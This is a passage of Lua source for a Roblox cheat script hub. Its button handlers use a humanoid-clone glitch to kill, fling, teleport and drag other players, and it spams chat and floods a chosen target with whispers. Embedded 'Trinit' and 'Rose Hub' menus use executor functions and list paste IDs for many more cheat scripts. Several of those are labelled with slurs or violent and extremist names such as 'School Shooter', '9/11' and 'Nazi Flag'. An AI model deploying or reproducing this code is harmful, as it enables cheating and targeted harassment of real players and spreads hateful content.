= 100000 t6.MaxSpeed = 5000 t6.ThrustP = 100000 t6.CartoonFactor = 1 t6.Name = "sixx" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head t1.Target = game:GetService("Players")[v.Name].Character.Torso t1:Fire() t2.Target = game:GetService("Players")[v.Name].Character["Right Leg"] t2:Fire() t3.Target = game:GetService("Players")[v.Name].Character["Left Arm"] t3:Fire() t4.Target = game:GetService("Players")[v.Name].Character["Left Leg"] t4:Fire() t5.Target = game:GetService("Players")[v.Name].Character["Right Arm"] t5:Fire() t6.Target = game:GetService("Players")[v.Name].Character.Head t6:Fire() game:GetService('RunService').Stepped:connect(function() if Maxing then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.onee:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.twoo:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.threee:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.fourr:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.fivee:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.sixx:Destroy() Max.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://184574340" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) Animateding = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) Animateding = false Animated.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end) Animated.MouseButton1Click:connect(function() Animateding = not Animateding if Animateding then Animated.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 200000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Animated" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head y.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart y:Fire() track:Play(.1, 1, 10) game:GetService('RunService').Stepped:connect(function() if Animateding then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Animated:Destroy() track:Stop() Animated.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) Attach.MouseButton1Click:connect(function() for i,v in pairs(GetPlayer(TXTBOX_PlrNameOTHER3.Text))do game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame end end) superspinning = false SuperSpin.MouseButton1Click:connect(function() superspinning = not superspinning if superspinning then SuperSpin.BackgroundColor3 = Color3.new(0.905882, 0.498039, 0.435294) for i,v in pairs(GetPlayer(TXTBOX_PlrNameOTHER3.Text))do game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame wait(1) while wait() do if superspinning then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end end else SuperSpin.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) end end) Kill.MouseButton1Click:connect(function() for i,v in pairs(GetPlayer(TXTBOX_PlrNameOTHER3.Text))do game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.4) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(100000, 0, 100000)) end end) SafeKill.MouseButton1Click:connect(function() local NOW = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end local function tp(player,player2) local char1,char2=player.Character,player2.Character if char1 and char2 then char1:MoveTo(char2.Head.Position) end end for i,v in pairs(GetPlayer(TXTBOX_PlrNameOTHER3.Text))do wait(0.1) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(-100000,0,-100000)) wait(0.7) tp(game:GetService("Players").LocalPlayer,game:GetService("Players")[v.Name]) wait(0.7) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = NOW end end) Bring.MouseButton1Click:connect(function() local NOW = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end local function tp(player,player2) local char1,char2=player.Character,player2.Character if char1 and char2 then char1.HumanoidRootPart.CFrame = char2.HumanoidRootPart.CFrame end end local function getout(player,player2) local char1,char2=player.Character,player2.Character if char1 and char2 then char1:MoveTo(char2.Head.Position) end end for i,v in pairs(GetPlayer(TXTBOX_PlrNameOTHER3.Text))do tp(game:GetService("Players")[v.Name], game:GetService("Players").LocalPlayer) wait(0.2) tp(game:GetService("Players")[v.Name], game:GetService("Players").LocalPlayer) wait(0.5) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = NOW wait(0.5) getout(game:GetService("Players").LocalPlayer, game:GetService("Players")[v.Name]) wait(0.3) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = NOW end end) FreeFall.MouseButton1Click:connect(function() local NOW = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end for i,v in pairs(GetPlayer(TXTBOX_PlrNameOTHER3.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.6) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = NOW wait(0.6) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0,50000,0) end end) while wait() do if SpammingChar then game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(TXTBOX_Chat.Text, "All") Spam_2.BackgroundColor3 = Color3.new(0.280392, 0.9, 0.543137) wait(0.5) else Spam_2.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) end if annoying then for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame Annoy.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) end else Annoy.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end if Carpett then for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame Carpet.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) end else Carpet.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end if following then for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame + Vector3.new(5,0,0) Follow.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) end else Follow.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end if headwalking then for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.Head.CFrame HeadWalk.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) end else HeadWalk.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end if Spammer then for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("/w "..v.Name.." @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@", "All") Spam.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) wait(0.5) end else Spam.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end if watching then for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do CreepyWatch.BackgroundColor3 = Color3.new(0.352941, 0.882353, 0.576471) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(game:GetService("Players").LocalPlayer.Character.Torso.Position, game:GetService("Players")[v.Name].Character.Torso.Position) end else CreepyWatch.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) end end end }) GUIS:AddButton({ Title = "Trinit", Description = "Trinit OP 3.0 GUI", Callback = function() -- MADE BY C++#2824 -- FILTERING ENBALED GUI -- TRINIT OP 3.0 local ScreenGui = Instance.new("ScreenGui") local OpenFrame = Instance.new("Frame") local Open = Instance.new("TextButton") local Main = Instance.new("Frame") local BeautyA = Instance.new("Frame") local Name = Instance.new("TextLabel") local BeautyB = Instance.new("Frame") local Credit = Instance.new("TextLabel") local rosehub = Instance.new("TextButton") local fearosia = Instance.new("TextButton") local jailbreak = Instance.new("TextButton") local TextLabel = Instance.new("TextLabel") local fehaxguiv2 = Instance.new("TextButton") local fehax1337 = Instance.new("TextButton") local icecreasimulator = Instance.new("TextButton") local bubblegumsimulator = Instance.new("TextButton") local feguir15 = Instance.new("TextButton") local IYFE = Instance.new("TextButton") local feguihastebin = Instance.new("TextButton") local slayingsimulator = Instance.new("TextButton") local Close = Instance.new("TextButton") local others = Instance.new("TextLabel") local hubs = Instance.new("TextLabel") local TextLabel_2 = Instance.new("TextLabel") local onepiecemillenium = Instance.new("TextButton") local kohlsadminhousenbc = Instance.new("TextButton") local dashingsimulator = Instance.new("TextButton") local phantomforces = Instance.new("TextButton") local beeswarmsimulator = Instance.new("TextButton") local lumbertycoon2 = Instance.new("TextButton") local mudrdermystery2 = Instance.new("TextButton") local strucid = Instance.new("TextButton") local TextLabel_3 = Instance.new("TextLabel") --Properties: ScreenGui.Parent = game:GetService("CoreGui") ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling OpenFrame.Name = "OpenFrame" OpenFrame.Parent = ScreenGui OpenFrame.BackgroundColor3 = Color3.new(0, 0, 0) OpenFrame.Position = UDim2.new(0, 0, 0.420472443, 0) OpenFrame.Size = UDim2.new(0, 100, 0, 39) Open.Name = "Open" Open.Parent = OpenFrame Open.BackgroundColor3 = Color3.new(0, 0, 0) Open.BorderSizePixel = 0 Open.Position = UDim2.new(0.100000001, 0, 0.104713634, 0) Open.Size = UDim2.new(0, 84, 0, 31) Open.Font = Enum.Font.SourceSansLight Open.Text = "Open" Open.TextColor3 = Color3.new(1, 1, 1) Open.TextSize = 40 Open.MouseButton1Down:connect(function() Main.Visible = true OpenFrame.Visible = false end) Main.Name = "Main" Main.Parent = ScreenGui Main.Active = true Main.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) Main.Position = UDim2.new(0.288034201, 0, 0.187401593, 0) Main.Size = UDim2.new(0, 695, 0, 289) Main.Visible = false Main.Draggable = true BeautyA.Name = "BeautyA" BeautyA.Parent = Main BeautyA.BackgroundColor3 = Color3.new(0, 0, 0) BeautyA.Size = UDim2.new(0, 695, 0, 26) Name.Name = "Name" Name.Parent = BeautyA Name.BackgroundColor3 = Color3.new(0, 0, 0) Name.BorderSizePixel = 0 Name.Position = UDim2.new(0.26885879, 0, 0, 0) Name.Size = UDim2.new(0, 240, 0, 26) Name.Font = Enum.Font.SourceSans Name.Text = "Trinit [FE]" Name.TextColor3 = Color3.new(1, 1, 1) Name.TextSize = 30 BeautyB.Name = "BeautyB" BeautyB.Parent = Main BeautyB.BackgroundColor3 = Color3.new(0, 0, 0) BeautyB.Position = UDim2.new(0, 0, 0.913494825, 0) BeautyB.Size = UDim2.new(0, 695, 0, 25) Credit.Name = "Credit" Credit.Parent = BeautyB Credit.BackgroundColor3 = Color3.new(0, 0, 0) Credit.BorderSizePixel = 0 Credit.Position = UDim2.new(0.26692456, 0, 0, 0) Credit.Size = UDim2.new(0, 241, 0, 25) Credit.Font = Enum.Font.SourceSans Credit.Text = "Made by C++#2824 (Script credits goes to the respectful owners)" Credit.TextColor3 = Color3.new(1, 1, 1) Credit.TextSize = 23 rosehub.Name = "rosehub" rosehub.Parent = Main rosehub.BackgroundColor3 = Color3.new(0.415686, 0.415686, 0.415686) rosehub.Position = UDim2.new(0.634053767, 0, 0.608392298, 0) rosehub.Size = UDim2.new(0, 152, 0, 20) rosehub.Font = Enum.Font.SourceSans rosehub.Text = "Rose Hub" rosehub.TextColor3 = Color3.new(0, 0, 0) rosehub.TextSize = 28 rosehub.MouseButton1Down:connect(function() local start = tick() local VERSION = "3.0.1" print"Rose Hub process started." local coreGui = game:GetService("CoreGui") --local coreGui = game:GetService("Players").LocalPlayer.PlayerGui local tweening = false local scriptsTabText = "" local feTabText = "" local gameScriptsTabText = "" local guiTabText = "" local darkBack = false local lightBack = true local tweenService = game:GetService("TweenService") local tweenSpeed = 0.35 local colorPickerOpen = false local backColor = Color3.fromRGB(255, 255, 255) local lightColor = Color3.fromRGB(255, 255, 255) local darkColor = Color3.fromRGB(150, 150, 150) local textColor = Color3.fromRGB(255, 255, 255) local httpService = game:GetService("HttpService") local savingSettings = false local mainSettings = nil local lighting = game:GetService("Lighting") local mWorkspace = game:GetService("Workspace") local defaultSettings = { ["BackgroundColorR"] = 59, ["BackgroundColorG"] = 59, ["BackgroundColorB"] = 59, ["PickerColorR"] = 59, ["PickerColorG"] = 59, ["PickerColorB"] = 59, ["ChangePickerBackground"] = true, ["Transparency"] = 0.7, ["RainbowOn"] = false, ["RainbowSpeed"] = 75, } local function round(num) return math.floor(num * 10^3 + 0.5) / 10^3 end if writefile and readfile and pcall(function() readfile("RoseHubSettings.txt") end) then local file = readfile("RoseHubSettings.txt") local continue = true local write = false if pcall(function() httpService:JSONDecode(file) end) then file = httpService:JSONDecode(readfile("RoseHubSettings.txt")) mainSettings = file else mainSettings = defaultSettings writefile("RoseHubSettings.txt", httpService:JSONEncode(defaultSettings)) warn("Settings file corrupted, creating new.") continue = false end if continue then for setting,value in pairs(defaultSettings) do if file[setting] == nil then writefile("RoseHubSettings.txt", httpService:JSONEncode(defaultSettings)) warn(setting.." is missing, setting to default.") file[setting] = defaultSettings[setting] write = true elseif file[setting] ~= nil then if type(file[setting]) ~= type(defaultSettings[setting]) then warn(setting.." is invalid, overwriting.") write = true file[setting] = defaultSettings[setting] end end end if write == true then warn("Fixing settings file.") mainSettings = file writefile("RoseHubSettings.txt", httpService:JSONEncode(mainSettings)) write = false end end else mainSettings = defaultSettings if writefile then warn("Rose Hub settings missing, creating new.") writefile("RoseHubSettings.txt", httpService:JSONEncode(defaultSettings)) end end local savedColor = Color3.fromRGB(mainSettings.BackgroundColorR, mainSettings.BackgroundColorG, mainSettings.BackgroundColorB) local mainTransparency = mainSettings.Transparency local enableRainbow = mainSettings.RainbowOn local rainbowCount = mainSettings.RainbowSpeed local mainTrans = mainSettings.Transparency local changeColorPickerBack = mainSettings.ChangePickerBackground local colorPickerBack = Color3.fromRGB(mainSettings.PickerColorR, mainSettings.PickerColorG, mainSettings.PickerColorB) local function saveSetting(backColor, pickerColor, changeBack, tranparency, rainbowOn, rainbowSpeed) local settingsTab = { ["BackgroundColorR"] = round(backColor.r*255), ["BackgroundColorG"] = round(backColor.g*255), ["BackgroundColorB"] = round(backColor.b*255), ["PickerColorR"] = round(pickerColor.r*255), ["PickerColorG"] = round(pickerColor.g*255), ["PickerColorB"] = round(pickerColor.b*255), ["ChangePickerBackground"] = changeBack, ["Transparency"] = round(tranparency), ["RainbowOn"] = rainbowOn, ["RainbowSpeed"] = rainbowSpeed, } writefile("RoseHubSettings.txt", httpService:JSONEncode(settingsTab)) end if darkBack then backColor = Color3.fromRGB(150, 150, 150) end local scripttabList = { {"Infinite Yield", "MjBzRjmT", 1}, {"Knife V3", "W833RBFr", 1}, {"Bird Wings", "RQ9b8UTv", 1}, {"M4A1", "eP1zq8tb", 1}, {"Dungun", "90M7Mi8e", 1}, {"Bomb Vest", "tG1PPuMd", 1}, {"Music Bars", "SvYebC2r", 1}, {"Omni God", "87NeeChc", 1}, {"Pain Titan", "Hg5L8EtM", 1,}, {"Reaper Titan", "B0q3QBg6", 1}, {"Alter Chat", "ZSB4pN9R", 1}, {"Hoverbike", 01268225564, 2}, {"Rail Gun Titan", "0wFiFdwM", 1}, {"True Hero", "P8AQ2ebJ", 1}, {"Celestial Wheel", "bymTcgzf", 1}, {"Knive V4", "j0Ns1w1S", 1}, {"Ravenger Claws", "D7GxxvWL", 1}, {"John Doe", "m5wHsLhr", 1}, {"Messor Titan", "4bSrkLtA", 1}, {"Clown Titan", "L0WLDZvc", 1}, {"Chara", "HrWjgXtb", 1}, {"Shedlesky Rage", "2SPz35LS", 1}, {"LunchaThug", "x6GWFC5K", 1}, {"Nazi Flag", "ZCZNxFBD", 1}, {"Psychopath", "DGqk3bqY", 1}, {"Fireworks Wand", "GB29NAPv", 1}, {"Psycho Clown", "UgxKqKwE", 1}, {"Inferno", "qhMGk36S", 1}, {"Police Titan", "UCmufLU8", 1}, {"Galaxy Titan", "nKNdCrKj", 1}, {"Holy Wrench", "cKSh0a8C", 1}, {"Krystal Dance", "j7EqLfbP", 1}, {"Pee", "3CYmA0Pz", 1}, {"Jihad", "vSujnuaF", 1}, {"Hermit Purple", "R3C3ajQV", 1}, {"Golden Gun", "2574Sd9E", 1}, {"Goku", "yAXZZF9r", 1}, {"Emoji", "vKPcMKnm", 1}, {"Damn Son", "AMLHT8aJ", 1}, {"Devuzi", "q0mt2peM", 1}, {"Flash", "gGSVVq1H", 1}, {"Teal Scythe", "0TUBSaxt", 1}, {"Demon Demise", "ghMDMW63", 1}, {"Red Sayan", "uC5DBvf9", 1}, {"Ban Hammer", "1ynQ4Mu0", 1}, {"Dick Gun", "UR9FBjcj", 1}, {"Dat Boi", "Sz7KJHay", 1}, {"Watermelon Trap", "pypsM3hj", 1}, {"Whip", "XDsek3Rf", 1}, {"School Shooter", "EmmwRFDA", 1}, {"9/11", "3UmV26hG", 1}, {"Bong", "8Kb08E9s", 1}, {"Horse", "MVph7nmq", 1}, {"Scythe", "fEEVkJba", 1}, {"Disco Fog", "xg8d4PS0", 1}, {"Disco Mesh", "GvtPCRVR", 1}, {"Russian Dance", "RADQ2vH8", 1}, {"Sun God", "0uJhLJ5m", 1}, {"Rolling Light Ball", "S4Hj3MPd", 1}, {"Red Death Scythe", "KJ5nqeVF", 1}, {"Crystal Pistols", "GDLZ4VAq", 1}, {"Epic Sword", "DZVV9AGG", 1}, {"Circle Visualizer", "diJiteen", 1}, {"Hex Blade", "fA0bBELV", 1}, {"Bulldog", "nPPLxSA3", 1}, {"FS-627-SENDER", "R3m4gfuP", 1}, {"Voodoo Child", "w5TEtd0Q", 1}, {"Bye Bye", "XBysEMgg", 1}, {"Galil V2", "cnFz3h8D", 1}, {"Mario", "pKmtnc9u", 1}, {"Lighting Blade", "rMEe8R4N", 1}, {"Flamingo Skybox", "8rWM880e", 1}, {"Sin Unleashed", "ZQh5B023", 1}, {"Ravager", "VQEz6a6i", 1}, {"Brock", "Fe5YrxcY", 1}, {"M249", "J4ijx897", 1}, {"MG36", "zLZ4Auqn", 1}, {"Omega Scythe", "Ag8dKZYB", 1}, {"Omega Sword", "7JjxwhPn", 1}, {"Draw", "1322re6a", 1}, {"Gaydar", "s1P9sJub", 1}, {"Crimson Hell", "na3pQXNV", 1}, {"Psycho", "WNvhEZJw", 1}, {"R6", "yX1DMcvM", 1}, {"Elemental God", "mLz55spD", 1}, {"Cross Power", "mLz55spD", 1}, {"Blood Harvester", "qz0ufnwd", 1}, {"Mustard Gas", "sg2wg4y8", 1}, {"Gas Can", "xknu2gna", 1}, {"Frieza", "tpkyda6c", 1}, {"Sadistic Genocider V2", "nch0tn9u", 1}, {"Demon Nelf", "VcBmmGuz", 1}, {"Demonic Sword", "W2Hc3Tkd", 1}, {"Noob Power", "9YMc9FRj", 1}, {"Creep", "z7S1ugBF", 1}, {"Crazy Nuke", "6kbRdDk6", 1}, {"Sticky Bombs", "2A4U8xdA", 1}, {"Cloud Visualizer", "sMCnTvHa", 1}, {"Furfag", "FS1d8pB9", 1}, {"Another Fist", "ukLjYGS1", 1}, {"Eyozen", "VmQXnzZs", 1}, {"Shadow Blade", "E08uiXDL", 1}, {"Glock", "UwRX1avh", 1}, {"Star Glitcher", "uiXScmiC", 1}, } local fescripttabList = { {"Fe God", "KduGECH6", 1}, {"Fe Fly", 1281055032, 2}, {"Spam", "74GjB7tB", 1}, } local gameScriptsList = { {"Virgo 3.0", "EwYDRD4Y", 1}, {"City Life Bomb Vest", "sLHGSBn1", 1}, {"City Life Suicide", "YdKKQ7yT", 1}, {"City Life Explosion", "vy78mqrG", 1}, {"CB:RO Aimbot", "t3yHg06t", 1}, {"Prison Life 2 GUI", "d6X2R39V", 1}, {"Jailbreak GUI", 1461971147, 2}, {"Apoc Tools v4", "0de4tAtR", 1}, } local guitabList = { {"c00lgui", "Rz2EFsLU", 1}, {"Topkek 4.0", "d0CJRrcg", 1}, {"Topkek 3.0", "SikGfE9u", 1}, {"Ro-Xploit 4.0", 175137115, 2}, {"Ro-Xploit 5.0", 288646117, 2}, {"Ro-Xploit 6.0", 364364477, 2}, {"Dex 2.0", 492005721, 2}, {"Dex 3.0", 418957341, 2}, {"Clown Van", "a5UZuuiT", 1}, {"Hell Elevator GUI", "8NYWpf2T", 1}, {"Chams / Aimlock", "Yi7fzELj", 1}, {"YourMom GUI", "289110135", 2}, {"Pepe GUI", "277881926", 2}, {"Brack Hub", "PT9Gf7d5", 1}, {"Vesprin FE GUI", "1231351616", 2}, {"Music GUI", "U352cdsv", 1}, } local mapsList = { {"Clockwork Arena", "EvnXCXhP", 1}, {"Town Map", 1345094164, 2}, {"Cave Island", "t29C42rm", 1}, {"Nature Map", "gmF4Kq5B", 1}, {"Nazi Map", "az8sLCLT", 1}, {"Ritual Room", "hYCTFiAC", 1}, {"Stripper", "jztW5Vuy", 1}, {"Witch Map", "R9epW292", 1}, {"Rainbow Tunnel", "8bznLitn", 1}, {"Scary Map", "fNw46f74", 1}, {"Nazi Camp", "KJNk4STm", 1}, {"Night Club", 1281063730, 2}, {"Da Club", "6UyLJheX", 1}, } local lists = { {scripttabList, "Scripts"}, {fescripttabList, "FE Scripts"}, {gameScriptsList, "Game Scripts"}, {guitabList, "GUIs"}, {mapsList, "Maps"}, } local tabs = { "Home", "Scripts", "FE Scripts", "GUIs", "Maps", "Audios", "Decals", "Executor", "ScriptSearch", "Game Scripts", "Settings", "Credits", } local threshold = 185 local transBackRunning = false local tweenTable = {} local function updateBack(...) local list = {...} local color = list[1] screenGui.Top.Main.BackgroundColor3 = color if list[2] and changeColorPickerBack == true then list[2].BackgroundColor3 = color end if round(color.g*255) >= threshold and round(color.b*255) >= threshold and darkBack == false or round(color.g*255) >= threshold and darkBack == false then if lightBack == true and transBackRunning == true then for _,tween in pairs(tweenTable) do tween:Pause() end end tweenTable = {} darkBack = true lightBack = false for i,v in pairs(screenGui.Top.Important:GetDescendants()) do local goal = {} goal.BackgroundColor3 = darkColor local customTween = tweenService:Create(v, TweenInfo.new(0.5), goal) table.insert(tweenTable, customTween) end transBackRunning = true for _,tween in pairs(tweenTable) do tween:Play() end tweenTable[1].Completed:Connect(function() transBackRunning = false end) elseif round(color.g*255) < threshold and round(color.b*255) < threshold and lightBack == false or round(color.g*255) < threshold and lightBack == false then if lightBack == true and transBackRunning == true then for _,tween in pairs(tweenTable) do tween:Pause() end end tweenTable = {} lightBack = true darkBack = false for i,v in pairs(screenGui.Top.Important:GetDescendants()) do local goal = {} goal.BackgroundColor3 = lightColor local customTween = tweenService:Create(v, TweenInfo.new(0.5), goal) table.insert(tweenTable, customTween) end transBackRunning = true for _,tween in pairs(tweenTable) do tween:Play() end tweenTable[1].Completed:Connect(function() transBackRunning = false end) end end local function createFrame(Active, BackgroundColor3, BackgroundTransparency, 